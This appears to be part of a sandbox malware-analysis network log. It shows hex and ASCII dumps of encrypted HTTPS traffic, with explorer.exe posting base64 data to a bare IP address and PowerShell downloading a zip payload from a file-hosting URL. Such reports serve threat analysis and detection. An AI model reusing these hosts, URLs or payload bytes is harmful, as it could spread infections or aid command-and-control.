2024-07-27 05:44:26 UTC	4096	IN	Data Raw: 33 95 ce 64 b8 6e 4a 63 20 5a 89 ec 08 66 8d 4f d6 f5 94 60 1f 4a 69 7a 91 77 33 98 ce e1 73 f5 64 f9 52 17 f4 ec 11 ff 0d 2b 1b b7 5c 82 b9 83 4d 06 af b5 93 16 93 73 06 4a da 21 57 0e d0 d4 9e e4 fa f7 cb 46 51 28 9c f3 f6 26 d0 6a 7c aa d9 31 b5 3b ff 7d cb 79 6f d4 dd eb ed e7 31 d7 1e 41 6c 9c 8b fc 7f 85 a4 04 36 5d 41 e6 6e 44 2e 2d 14 7e ad 9c 70 7a 7e e5 31 7f c5 00 67 b5 90 1a ea ea ea ea ea ea ea ea e8 e9 e9 e9 e5 e6 e6 e6 e6 e6 e6 e6 e0 13 44 2f 56 22 5c 4e 1d e3 63 a0 71 d0 96 6e 78 69 bc ae ef 38 6c da c7 37 97 5e e2 c0 d1 91 6c de 28 53 5e fb b0 9c 48 d1 02 aa f8 a5 f3 52 1e c6 a3 90 9d ea bc ea 56 12 20 18 75 cb 1f 54 c6 e9 c3 dc eb 37 3b 32 ca d2 da 51 95 29 35 28 8e 30 e1 f1 c9 21 dc f4 12 04 2f f9 89 ad 07 e3 87 16 7a 85 5d d5 e8 2c 01 Data Ascii: 3dnJc ZfO`Jizw3sdR+\MsJ!WFQ(&j\|1;}yo1Al6]AnD.-~pz~1gD/V"\Ncqnxi8l7^l(S^HRV uT7;2Q)5(0!/z],
2024-07-27 05:44:26 UTC	4096	IN	Data Raw: 33 7a bc 50 22 52 fe a2 f8 c4 39 89 3f 2e b3 06 08 22 29 03 16 ca 97 fa fc ec cb 51 ad b4 e3 59 e8 e8 bd cc 9c a4 44 21 29 8f 90 c0 20 2c b5 46 f5 45 56 76 bd 24 35 12 10 a7 35 d7 08 20 36 69 79 3a 22 a3 79 ff 42 41 6f db 85 d3 ef 9b 60 55 f9 54 8a c2 72 9b 7d 54 31 eb dc dd 48 dc c5 49 8c 2c a0 65 61 e7 62 0d 64 c0 f9 be 99 1a 67 5d ea 32 e5 3d cf 89 03 e0 09 db 8e af d9 26 6e b6 8a ae df 68 1a be 7c 10 e4 5c 57 87 1e 20 02 ed 21 8c 01 fd f5 e3 93 62 56 48 53 d7 19 37 00 9f 42 f1 58 a5 c2 b5 61 3a f9 d7 fb f8 81 4c 18 8a ca 16 4d e5 59 cf 2f e4 0c a5 df 09 13 fc 1b d0 33 b0 a1 12 db fd 3c 03 81 b3 76 41 58 ff 5e 80 17 f4 3c 43 4e 55 da 72 3b 68 6c e6 a0 58 55 c7 6a c2 2b 97 6b 53 bf 9d 7c e8 61 47 e2 ed 07 35 e2 05 c1 5d e7 ae 3b a5 4d fd a7 3f 25 5d 9f Data Ascii: 3zP"R9?.")QYD!) ,FEVv$55 6iy:"yBAo`UTr}T1HI,eabdg]2=&nh\|\W !bVHS7BXa:LMY/3<vAX^<CNUr;hlXUj+kS\|aG5];M?%]
2024-07-27 05:44:26 UTC	4096	IN	Data Raw: 3d cd 6c 50 05 c1 90 f9 06 f1 67 cd c8 d2 23 5d 14 fe ee d9 c2 b5 3e 6e 71 71 cc f5 88 08 47 5b 04 c1 44 5c 8f 0b 5a 1f 96 70 7e fb 05 aa b8 f1 4c 3a 6f 3c e8 a1 d6 f5 91 60 4d 31 3c b9 44 32 47 5d 53 a4 d9 a8 2f a8 28 b5 e3 d2 c1 85 41 89 e0 3b 13 57 8f c5 4c 00 af 1d c0 97 54 25 95 13 2c 2f 72 31 b7 ef f4 4b 14 c3 03 7d ea 68 b1 62 c5 af 3f 21 19 5a d2 25 78 8f 6e 38 4d 89 27 13 3b 77 40 0a b7 47 1e 2c 80 7d 26 63 cb 15 8e 56 7c 85 40 80 57 d6 38 d9 bd 43 c8 72 f6 55 4b bf 28 3d d1 51 9f c2 e4 b3 20 48 f8 19 c7 60 04 c6 3f 2c 0a cf 2f 84 47 3a 0e 81 c7 80 3e 8c 55 4a a5 79 af 21 b1 08 fd 56 55 13 f2 ac 96 e3 5c dd 6b b0 c6 26 c4 12 77 5d 8b 5b 23 2d 97 ac b5 9a a1 e6 63 44 d1 6f 92 dc 97 06 a7 4e b4 97 55 dc be 7a 6a 16 6b c8 45 30 c2 40 7b 66 f3 cf 3a Data Ascii: =lPg#]>nqqG[D\Zp~L:o<`M1<D2G]S/(A;WLT%,/r1K}hb?!Z%xn8M';w@G,}&cV\|@W8CrUK(=Q H`?,/G:>UJy!VU\k&w][#-cDoNUzjkE0@{f:
2024-07-27 05:44:26 UTC	4096	IN	Data Raw: 42 2f 38 dc 0f 26 2c e6 f7 ba 11 2e 00 f4 ca 5b de 37 06 33 99 8c 4f e9 32 9f 90 d8 f5 9b 8f c6 83 53 f0 f0 07 ff dd 71 a4 f2 63 ee ff 47 34 ad 89 c3 31 65 8f b4 fc dc 75 39 15 dc 3b 4a d9 aa 2f 79 ba ae 05 7a a2 c6 e9 a5 36 5c aa eb bf a3 22 42 59 64 a1 f1 c6 a9 43 41 b5 fc e9 75 85 c5 17 0c 95 26 59 3a 58 e6 49 1b 14 81 5f 74 e7 23 30 f6 7e f6 b4 dc f0 4c 8f 9f af ce bb 39 7d b8 0c 38 2c 3c 85 bf 73 89 15 05 d9 c7 ba 9c b0 b6 c7 06 26 f2 55 21 d3 e8 dd 23 fb 58 ab 31 f7 f1 2f 08 0b 84 52 0e 65 c5 d4 d5 cc 85 5c 7e 25 39 2b 97 b0 fd 15 5c a6 a6 29 65 e0 4c 80 4c 7c b6 a0 29 66 e5 a4 b5 7d 8f de f3 1c 55 68 d7 4b b2 1c 15 f8 6b 16 f3 6b 56 5b 29 d5 af 2c 62 11 75 4f 88 28 1d 01 5c 72 b1 4c fa 88 2c 6d 10 31 fe a6 e3 c9 fd f3 8a fd 1e e3 f2 9d 57 07 4c 53 Data Ascii: B/8&,.[73O2SqcG41eu9;J/yz6\"BYdCAu&Y:XI_t#0~L9}8,<s&U!#X1/Re\~%9+\)eLL\|)f}UhKkkV[),buO(\rL,m1WLS
2024-07-27 05:44:26 UTC	4096	IN	Data Raw: 0e 76 6b de 75 6e 21 70 29 8a 7a 31 f3 42 32 b6 49 e1 39 ac f9 c0 3f 5e 6b cf ce a1 c4 13 20 f4 96 f6 90 a8 7d ff 0f 2d e4 fd 74 e3 28 c4 d3 a4 83 f0 30 bd 5e 35 61 bd 64 6c 4a 98 8e 03 e9 e7 05 96 6f b4 12 12 89 9e 7b 1b 40 b5 7e 9b ee 82 1d ea ac cb eb 85 06 c0 2f cc 86 33 8e d7 97 b4 c6 82 20 54 76 54 8c af 89 09 69 bb 91 a2 ee 7c f8 e1 b4 32 0d 4c 5a 4f 74 f8 c3 10 ce 72 b4 cc f9 9d f6 57 9e 05 fe fc 21 9e 9c b7 9d 80 ac 8e 23 84 cc 0f be ac aa 0c bd 22 9a 24 ed 55 b5 b2 b2 7e ab b7 2e ab 93 60 d4 2c 1d 4b 67 0d 6d 0a c8 7e 7b 84 69 80 46 10 a4 e3 28 d1 3c 8b 77 14 8d b8 f4 c1 73 73 b8 b4 c6 77 e8 3d f2 b0 95 48 48 18 24 3c 8c 2f 5c 85 6c 71 e0 1a 52 82 c2 f7 04 c8 16 03 77 bd ea 37 7a 0e e1 1e 83 63 e5 ab e4 1d 2f 56 22 a4 ab 71 eb f7 7f 71 ab f2 79 Data Ascii: vkun!p)z1B2I9?^k }-t(0^5adlJo{@~/3 TvTi\|2LZOtrW!#"$U~.`,Kgm~{iF(<wssw=HH$</\lqRw7zc/V"qqy
2024-07-27 05:44:26 UTC	4096	IN	Data Raw: 61 44 99 ae d9 5f 85 61 f5 9a ae b4 27 63 28 9a e3 83 1c 5c 93 9e d9 a4 e0 ef 8b 92 20 f7 c5 6c b4 66 b5 3f dc b1 f4 f6 c4 46 c0 4d 59 9a 4c 9e 82 0a 05 f6 a8 b8 bb 46 f5 76 6b 3c 91 55 e6 c1 d1 aa 30 5b 35 05 ea b8 78 9d 48 d7 e3 2c 79 14 3e ad fa 94 8c a5 14 d8 23 52 d5 0d ee 34 f9 47 53 f7 63 6c 45 ae 5c 72 45 7b b9 64 83 ed 54 74 62 f3 54 87 71 3a a0 ba 5d 1e 9a 44 84 25 4c 29 11 85 62 28 86 c4 62 4d d5 3c f8 fa 12 75 d4 2c 7b 53 fb 08 b5 05 34 23 b3 36 45 35 e0 e7 67 5c 50 97 3f 4e 81 85 63 a9 22 b9 9c 03 6d 9a 53 9f 5d d7 2f e3 ef 69 7b ac de ac 89 67 c3 68 45 93 32 f9 61 e3 34 0b 87 95 47 00 ef c4 cc d6 ef ff 91 99 d2 25 27 05 96 11 b1 3d b9 88 c9 24 24 33 ed 57 59 5f e1 47 43 dc 39 fe 91 57 63 33 5e 48 e4 11 0a 02 d4 72 f4 ed da f1 25 78 7f d6 4a Data Ascii: aD_a'c(\ lf?FMYLFvk<U0[5xH,y>#R4GSclE\rE{dTtbTq:]D%L)b(bM<u,{S4#6E5g\P?Nc"mS]/i{ghE2a4G%'=$$3WY_GC9Wc3^Hr%xJ
2024-07-27 05:44:26 UTC	4096	IN	Data Raw: c6 9a 08 b4 f1 1f fe 00 fd 46 f6 8d 91 d7 25 3e 0d bb b8 2a 21 34 7f 26 7b d8 57 ea 8b f7 d4 dd 58 da 17 30 a7 07 70 66 05 33 de c5 86 42 1b c6 45 a9 3c dc dc 0b 07 c5 ad 5a a4 4c 86 2d 04 ba 90 3f fb 2c cd 71 25 2a 95 61 01 3b 85 d4 e5 9b 47 da 17 5a 13 71 e8 f5 ea f7 ef 53 e7 36 e6 cf d0 c9 1e 25 b7 79 66 93 a9 64 94 bc df 87 83 c0 4d 92 09 63 4e cc 7c c6 6c d1 78 1f 7c 2a be ad c7 bc 69 39 a7 c3 00 4a aa 0e 27 c1 0e 13 ec 8c bd 32 07 a0 0c b3 0b 16 f0 ff 57 42 e1 26 ec 71 b4 af 88 d3 13 0a 08 9f 0f 17 be d1 71 ef 82 06 8b 4d 52 1a 86 06 d6 b9 1f ae 05 4b 6d ca 31 67 fc 97 75 29 2a 72 bc 54 11 2c a8 ce 94 05 dc 54 a5 09 61 bc 9f e5 d1 7e fb 1a bd d3 eb 17 e9 e5 cc b9 c9 ce af 4f 84 ad da 97 12 2d 81 d4 5a 23 c4 15 9e ec 98 91 c6 16 eb 2d 6a e9 f5 4d 45 Data Ascii: F%>!4&{WX0pf3BE<ZL-?,q%a;GZqS6%yfdMcN\|lx\|i9J'2WB&qqMRKm1gu)rT,Ta~O-Z#-jME
2024-07-27 05:44:26 UTC	4096	IN	Data Raw: 3a b1 f5 56 a3 46 09 66 0f 7c 4c 68 ea 1d 72 9d 06 f0 dd e5 73 ca d9 33 bc 95 e7 29 85 46 2e 9d a1 a4 9c 63 57 56 c6 c6 f4 4e 05 86 44 ea 37 65 30 84 79 0e f7 c8 84 b4 71 bf a2 de b1 b6 10 87 06 07 3c c9 76 a3 0a 7b 4f b7 1c 1c 66 da 89 8a d3 9e 10 3b 35 97 b2 1e 18 99 80 6e 22 b5 7f 7e 41 4a 3b 98 1b ae 71 de 60 d0 9d aa a6 73 c8 99 ce 00 6b 4e e5 c9 cf c7 04 a1 f0 49 64 6f 8b 8b 4f 01 9c c4 f3 ce 4b 1d d5 26 87 81 88 3c bf f2 b6 b3 f7 97 ee b1 1b 4f 8a 74 24 1d 92 1f 39 7d 2e c0 0d 9c 17 b6 d9 71 34 3f e0 78 cf a5 0e 4a 3f 57 9a eb 75 57 48 2c e4 f1 d5 b9 69 f1 41 3c 32 ff 23 ed 60 09 21 98 5e b9 9e ba 67 95 00 9d 25 f9 62 1d 1d 2a 4e ce bb 74 52 27 97 11 39 71 ac df 04 ca 34 71 9e 44 70 1a 53 8e 78 5f 07 6b 28 8b f1 b4 f8 8a 93 e3 13 27 0f 8d f1 c6 a2 Data Ascii: :VFf\|Lhrs3)F.cWVND7e0yq<v{Of;5n"~AJ;q`skNIdoOK&<Ot$9}.q4?xJ?WuWH,iA<2#`!^g%b*NtR'9q4qDpSx_k('
2024-07-27 05:44:26 UTC	4096	IN	Data Raw: 34 02 0a 6c 1e bc a6 59 40 b8 41 3d 0e 24 4e 66 dc 6d 19 d4 b0 73 28 7c b0 e5 f2 82 51 cf 80 02 43 34 45 2a 9a 8c 3c 60 2f d1 7b 7f 0b 5f 2a 3e 10 b3 8a ab 82 8b e6 6a f1 a1 5e 1b b8 8f 71 db 09 d9 be 39 83 6f 1e 51 d4 3c 3f 80 8c 5d 7a 31 6e b3 89 67 c0 30 d7 df c0 f0 1e ed e0 92 d9 a7 09 0f b6 9c 47 81 a8 12 48 60 10 4f 14 0c d3 15 ca 54 23 e5 5d 6e c5 03 e5 10 9a f0 3e b4 02 26 e8 b9 01 a6 65 79 5b 7b 66 b2 5c 70 b9 16 d5 26 f9 e8 5e e9 ea 5f 00 b7 73 25 b9 f9 5b 5e 3e 82 1f 48 f2 6c 61 0b cf e4 cd d2 33 e4 c8 4c 19 05 b7 09 57 69 33 c0 b2 9a 94 93 2b dd 7c 16 b4 60 18 99 a7 c8 d2 de 5c c7 7e 8b 11 30 93 37 15 e0 02 01 c1 b1 78 df f0 1c 5a 35 e4 ab 35 1b 06 54 d1 af 73 88 df e2 29 cb b9 b3 48 0a ab 78 5d 2b 7d 88 a5 e6 28 f3 1d 1d f6 db 5c 10 cd f6 2c Data Ascii: 4lY@A=$Nfms(\|QC4E<`/{_>j^q9oQ<?]z1ng0GH`OT#]n>&ey[{f\p&^_s%[^>Hla3LWi3+\|`\~07xZ55Ts)Hx]+}(\,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	62281	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:27 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:44:27 UTC	1267	OUT	Data Raw: 44 77 7a 4d 7a 6e 6d 54 46 49 38 46 6c 64 53 76 72 6d 77 2f 76 4b 53 69 64 49 74 4d 6e 46 4e 6c 56 44 32 4c 43 66 6b 65 4b 6b 33 54 44 58 6f 57 50 2b 76 5a 76 77 75 56 2b 74 44 72 46 31 30 58 6e 73 4c 65 4b 79 35 38 58 4c 54 57 68 63 66 39 37 53 56 53 42 52 39 4f 31 65 54 58 61 64 6b 49 75 44 7a 46 4e 38 61 48 6d 6a 46 56 54 79 57 75 7a 34 78 61 72 59 6a 6b 58 38 2b 39 6a 6f 62 30 7a 76 6c 7a 61 63 70 4e 76 75 57 4c 65 64 50 6f 53 43 38 44 62 65 37 61 4c 4d 32 69 59 43 6a 4d 67 65 34 2f 33 35 74 72 47 78 4d 47 68 4c 43 4e 58 6d 75 46 43 31 4e 62 6e 39 56 45 57 4e 66 4f 74 48 39 54 59 55 4a 78 43 62 42 32 52 30 79 7a 68 65 75 7a 4c 46 61 6c 45 4f 63 63 35 57 42 6a 56 55 59 72 71 4a 36 72 72 59 6c 46 47 35 7a 48 76 35 2f 77 41 31 57 42 6b 69 34 34 77 64 41 Data Ascii: DwzMznmTFI8FldSvrmw/vKSidItMnFNlVD2LCfkeKk3TDXoWP+vZvwuV+tDrF10XnsLeKy58XLTWhcf97SVSBR9O1eTXadkIuDzFN8aHmjFVTyWuz4xarYjkX8+9job0zvlzacpNvuWLedPoSC8Dbe7aLM2iYCjMge4/35trGxMGhLCNXmuFC1Nbn9VEWNfOtH9TYUJxCbB2R0yzheuzLFalEOcc5WBjVUYrqJ6rrYlFG5zHv5/wA1WBki44wdA
2024-07-27 05:44:28 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:28 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:28 UTC	685	IN	Data Raw: 79 6c 55 34 63 72 51 6b 6a 70 41 68 56 7a 6d 64 6b 6f 37 66 53 75 6e 4b 70 61 61 75 64 71 46 68 4b 41 4e 37 51 43 59 44 43 7a 59 52 37 73 55 65 74 7a 47 55 65 50 4f 36 6f 74 74 39 59 31 76 4c 51 2f 73 2f 57 76 4f 45 68 42 46 75 5a 71 66 48 76 63 78 6c 39 54 5a 75 53 6b 2b 43 38 45 34 70 72 7a 32 44 77 70 69 54 4e 65 43 50 6e 74 78 75 2b 67 6f 34 6e 35 45 68 39 53 7a 66 45 63 33 72 46 47 47 5a 57 6e 31 34 6c 33 4d 55 33 6f 62 44 76 6f 75 6c 56 34 75 30 73 34 71 52 72 4c 53 49 57 61 4f 79 43 59 42 37 49 6d 34 34 6b 45 7a 38 43 34 6a 72 69 71 70 39 45 75 67 4f 54 67 6f 7a 37 47 33 75 33 62 51 62 49 52 36 58 6f 43 51 72 53 76 68 6d 45 6c 6d 44 39 45 47 52 7a 6c 62 43 56 59 46 34 31 44 75 4f 4e 2f 38 32 59 54 48 44 44 6d 30 6d 31 63 59 46 34 77 65 74 6a 53 59 Data Ascii: ylU4crQkjpAhVzmdko7fSunKpaaudqFhKAN7QCYDCzYR7sUetzGUePO6ott9Y1vLQ/s/WvOEhBFuZqfHvcxl9TZuSk+C8E4prz2DwpiTNeCPntxu+go4n5Eh9SzfEc3rFGGZWn14l3MU3obDvoulV4u0s4qRrLSIWaOyCYB7Im44kEz8C4jriqp9EugOTgoz7G3u3bQbIR6XoCQrSvhmElmD9EGRzlbCVYF41DuON/82YTHDDm0m1cYF4wetjSY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	62282	31.14.70.245	443	1904	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:28 UTC	196	OUT	GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: store4.gofile.io
2024-07-27 05:44:28 UTC	577	IN	HTTP/1.1 200 OK Server: nginx/1.27.0 Date: Sat, 27 Jul 2024 05:44:28 GMT Content-Type: application/zip Content-Length: 528925 Connection: close Accept-Ranges: bytes Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range Content-Disposition: attachment; filename*=UTF-8''lm.zip Last-Modified: Sat, 20 Jul 2024 15:36:00 GMT
2024-07-27 05:44:28 UTC	512	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 15 7b f3 58 c4 92 38 a6 85 28 05 00 fb 29 05 00 08 00 00 00 64 61 74 61 2e 62 69 6e 00 1f 2c e0 d3 60 9c e8 00 00 00 00 5e b9 dc 29 05 00 b2 c8 30 94 0e 17 00 00 00 02 94 0e 17 00 00 00 e2 f0 92 75 77 e0 85 72 c2 bd 55 09 ce ca ca 84 3b 3f 3f 0e c2 8b 6b 30 14 f1 48 5f 7b 5a 41 91 0d 98 6b bd 94 61 e5 1b 0f c7 0d e8 65 1b 1e 86 14 20 20 20 20 20 de 75 6a 5f b1 2f fb 26 7b 45 0a be 05 ce 79 a3 39 b7 9a 41 a5 20 83 99 3c e6 22 4c 5c 50 75 cc ac e5 bf bb 2b 64 04 96 20 44 f6 f2 9e fe a4 c7 03 8b c5 fc 9a db 81 f9 b6 56 87 3e 30 c0 10 f4 29 a7 48 41 3b 11 24 9d e8 5a 82 2f 28 ea db 56 e9 10 b5 2d be c2 89 6f 5a b4 5b 18 da 65 94 95 19 65 cb 0e 2a 07 ab d8 36 9d 69 45 5b bd d9 93 47 b7 30 36 34 d4 e2 c4 5e 50 b0 df 6a 5e a1 fd 2a Data Ascii: PK{X8()data.bin,`^)0uwrU;??k0H_{ZAkae uj_/&{Ey9A <"L\Pu+d DV>0)HA;$Z/(V-oZ[ee6iE[G064^Pj^
2024-07-27 05:44:28 UTC	4096	IN	Data Raw: 27 7d 90 93 89 da 18 99 b1 94 27 99 fd a0 93 e7 48 02 6b 2d bf a3 8c cf 47 1d 47 18 b1 7d d1 23 48 8c 6f 8f 14 00 b5 e3 85 16 01 43 9f ef 87 c1 f8 68 45 38 ef 5c 98 95 fd 4e 04 cc e7 73 c6 fe a3 87 fb 83 4e 0e 0e 5e 87 7c 3a 7b fc f9 c6 40 d8 2e d9 11 c1 98 1e c0 6c 01 91 60 e7 7b 11 43 ce 3f b8 b4 aa 26 76 18 4e 79 ac 1a 34 88 25 f7 a1 16 f3 5c 88 f8 d1 c8 c3 19 7f 9b 71 cb f2 f2 f2 f2 f2 f2 f2 f2 f0 f1 f1 f1 ed ee ee ee ee ee ee ee ec 99 58 af a5 d8 11 da 20 4f e9 7e 4b 0f 70 94 c2 78 d6 ba de 37 19 00 6d 11 92 09 11 8d 01 47 a5 36 46 65 a2 bf 75 a7 f3 1d 24 c7 73 1a 5b dd fb ff 13 f5 3b d7 71 8e 98 2a cc ac 29 7c 76 26 e1 ea 12 0c 30 3a 30 8f 15 4d 3a a3 21 ff 92 36 82 b3 00 37 e1 ab 75 bb d9 ed d8 8f f9 21 c4 33 14 d9 8d ae 44 8e 10 09 58 e8 1d a1 b5 Data Ascii: '}'Hk-GG}#HoChE8\NsN^\|:{@.l`{C?&vNy4%\qX O~Kpx7mG6Feu$s[;q*)\|v&0:0M:!67u!3DX
2024-07-27 05:44:28 UTC	4096	IN	Data Raw: af 24 7f ff a8 11 2f 31 d0 dd 50 69 a0 b2 c6 b1 ed 2e ae a6 dd b7 c5 cf 9c 12 39 04 10 4c d5 e5 3a 1d eb fb 06 97 dc 93 15 25 25 62 81 da 82 5a 94 70 f6 94 67 ed 55 5c 3a 9b 40 dc 02 ce c0 22 2a 1f a4 47 f6 56 d3 c0 8f f2 9c 4f b6 f8 94 f5 31 a0 d4 85 3e 8a 20 95 35 69 c6 8f ad 42 5e 48 56 41 db 31 da d4 55 49 bb cb fb b6 d6 3f 1a f2 c3 32 46 15 ad bd 66 51 51 10 1e 41 2e f0 ac ac 53 b9 5e c4 17 fd 47 5e a6 5e c5 68 36 74 62 20 f9 f2 25 b4 01 58 94 71 98 14 86 ad ef 40 84 6a ca 90 2b 3d 86 9b 44 37 ee b0 84 6a dc 84 c0 51 8d d3 61 f8 ff 92 d1 c0 9b 95 36 cf ef 2b 19 05 80 ee 3f d7 a5 27 c9 e8 6b a5 8e de c5 39 89 c1 41 be 2f bd 19 5d 7f 8d 27 76 c6 ab b7 aa e4 9f 05 f5 d8 b4 cd e0 d1 b3 2b 7b 0c c7 e5 f2 4d d8 f6 f9 54 bd 4a f5 e3 0a 21 5a e9 76 4a c6 19 Data Ascii: $/1Pi.9L:%%bZpgU\:@"*GVO1> 5iB^HVA1UI?2FfQQA.S^G^^h6tb %Xq@j+=D7jQa6+?'k9A/]'v+{MTJ!ZvJ
2024-07-27 05:44:28 UTC	4096	IN	Data Raw: dd b2 3e 61 5e 59 f4 fe a7 cb 64 4f af 06 49 5b 21 dd d2 12 6b b1 b0 74 54 58 ea f5 57 7f a7 e9 95 6f 72 39 4a 59 b1 da 34 09 19 46 8a 36 b1 ca 31 5f 02 91 31 6f ee c6 98 2f e4 4e d1 63 a7 74 ef d0 a0 8a 24 dd a7 63 9c 7e d9 1e 22 89 03 84 74 b4 81 be 0a 14 81 d1 b6 b6 fc e3 2e cc ea 56 08 c2 ca 9a 0d 9e 5c a8 af e7 02 d2 39 cb 4e e8 24 58 3a c8 4a b7 81 9b 1d a3 ab f5 71 20 cc df d9 65 a6 6e d7 63 ce bd a4 48 3b 9a 8c 9a 1a 8c cf 4b 6a e2 2e e6 a5 ac d1 38 9e 37 02 18 9c 45 6e 16 a5 48 34 00 2f 2c 7f 18 6f 60 61 c3 63 e5 a1 de 7f 09 36 81 38 41 c2 d4 5b 83 07 64 cb a2 cf bc c0 16 e5 04 f9 86 d6 95 ee 1f 37 1e 18 c8 6b 50 98 ce 9c 7d a0 92 4b 16 50 df 88 0e 68 10 93 3b 8c 17 4b 6b f4 1d 47 19 0f ad 68 78 70 ef da 81 5c 50 75 e1 85 70 af 04 07 b6 1f fc e4 Data Ascii: >a^YdOI[!ktTXWor9JY4F61_1o/Nct$c~"t.V\9N$X:Jq encH;Kj.87EnH4/,o`ac68A[d7kP}KPh;KkGhxp\Pup
2024-07-27 05:44:28 UTC	4096	IN	Data Raw: 00 17 06 b8 0c 9c 9c f8 87 f3 40 ca be 10 75 b5 55 5d 7e 13 de 84 67 8b e8 af 39 c0 22 80 2c 4c eb 09 fa 21 a0 62 54 d7 30 fd 53 f8 21 92 70 71 91 2a 79 43 5b e3 5c 65 ef a8 6e aa 92 76 c1 e1 6b c1 13 76 cc 1f ca 04 ab 1c c6 2c 57 2c b6 df 66 b2 68 b5 6c 8b 54 00 1c 22 7c 26 10 e0 7e 05 de 50 88 cf 4b 7e 5e 9d 6a f1 f0 2e 9c 66 ca 74 51 87 cc 70 0b a7 7a 2c ef 04 d0 7c b8 bc 81 9b 37 f7 75 09 58 a7 e3 e3 80 16 6f 25 3a 84 19 15 18 d8 5f 29 86 a5 66 40 f2 d3 40 0b ed 8d 87 ba cf fb 3a 31 8b 4a dd d9 15 34 f7 8e 8d b0 02 37 0d d9 6e cc d0 aa 51 cc f9 7f 6d 53 a1 4a f6 c8 78 e8 3d d0 a9 62 8b 1c 1b 6c 90 ff 61 b0 56 07 6e e9 bb 2c cf 05 30 00 9a 4f 51 b0 bb ac 2e 3a 3d d4 a3 00 c6 ed 0d 65 a9 c3 a6 56 65 cb c9 07 de 2c 36 da a4 87 c7 d6 1b 73 3a 88 17 5c ab Data Ascii: @uU]~g9",L!bT0S!pq*yC[\envkv,W,fhlT"\|&~PK~^j.ftQpz,\|7uXo%:_)f@@:1J47nQmSJx=blaVn,0OQ.:=eVe,6s:\
2024-07-27 05:44:28 UTC	4096	IN	Data Raw: ee cf 5a 9d 22 b8 98 cd a0 f8 78 46 c4 71 0d d5 e5 08 fd f8 3d bf 4c 7f c1 fe e2 f6 7e 36 6e 1f 5b db f4 b7 0a 85 37 67 fd 8c 70 e0 a7 7f 86 c9 7b be 31 50 e7 9e 6b e0 73 3e 94 09 9d 14 54 39 20 28 6d 03 b6 a3 d3 94 89 52 dc de b4 5a c9 e8 1b f2 96 f4 f0 b0 7d d5 91 e2 34 0e c7 05 3b ea ff e7 08 81 81 82 bd d6 5f d3 4f a1 97 b2 55 ea 70 9c bb 11 15 23 ae b8 83 6f 06 ee 54 9c 27 95 21 94 a5 14 13 f3 29 cf c8 e5 ee 5d 76 dc 9d 06 7a da ff 0f 51 97 e0 e1 a0 0b ef cc 4c f5 1b a4 83 c5 60 48 d5 dc 82 1b 32 5c 3d 5a 03 df 69 a7 94 ad cd b0 0a c9 3a 1c da 87 e0 02 e3 64 88 b2 fb c3 ce c2 21 65 67 ee a2 d3 d2 be 87 5c 47 21 db b8 53 8c 29 9d 5b 62 95 19 26 f2 9d 64 25 bb 00 3c ff 4b c8 01 dd c8 8c a9 b4 47 87 cf 7b b2 b2 04 a1 49 d6 91 87 63 f2 bd 19 99 23 a1 52 Data Ascii: Z"xFq=L~6n[7gp{1Pks>T9 (mRZ}4;_OUp#oT'!)]vzQL`H2\=Zi:d!eg\G!S)[b&d%<KG{Ic#R
2024-07-27 05:44:28 UTC	4096	IN	Data Raw: 9b 09 13 39 5c 5c 64 9f ab f1 3f b6 09 8a 2d bc 4d 0f 4a 6f 9f 88 dd d8 95 aa 8c cc e4 76 8c 81 9d de 39 42 71 ee cd c5 58 cb b0 3c 57 13 8c 89 5a e8 2e 60 17 bc d0 7a 76 4b a5 79 72 cc 16 98 fe fd f1 f2 a3 36 95 dd e8 5d 4b 60 d4 37 b4 bf 2f 1e c3 03 56 cf 5a 82 de d5 66 25 36 5a a2 14 37 a5 36 b4 cb 40 3c 7c 76 c5 a2 87 71 ba 19 73 90 56 0b a5 04 51 d4 aa e0 68 f0 fb 3f 10 a3 ad 97 3a 16 ec 6a 97 a7 e3 83 a3 b9 4a 75 d7 28 b0 07 ee 02 c9 a1 86 65 3e 0b fc df 38 ca 60 05 2e bd 36 c8 b7 bc 06 74 e9 91 cf 50 2f c6 d8 dc 29 f0 43 57 34 ad 01 cb 85 af a6 0a 1e 74 d2 5f 41 70 f1 c8 64 ba f5 73 77 7e c6 ee b3 b9 9e 31 13 67 51 c4 8d 93 cf f9 33 64 bb 53 ea df 91 c1 20 c8 cb e8 75 ea 85 3b 7e 3a 4a 13 52 8e ba a7 da 83 e0 2b 7e 14 43 46 2c d0 ff 53 3c f0 c2 08 Data Ascii: 9\\d?-MJov9BqX<WZ.`zvKyr6]K`7/VZf%6Z76@<\|vqsVQh?:jJu(e>8`.6tP/)CW4t_Apdsw~1gQ3dS u;~:JR+~CF,S<
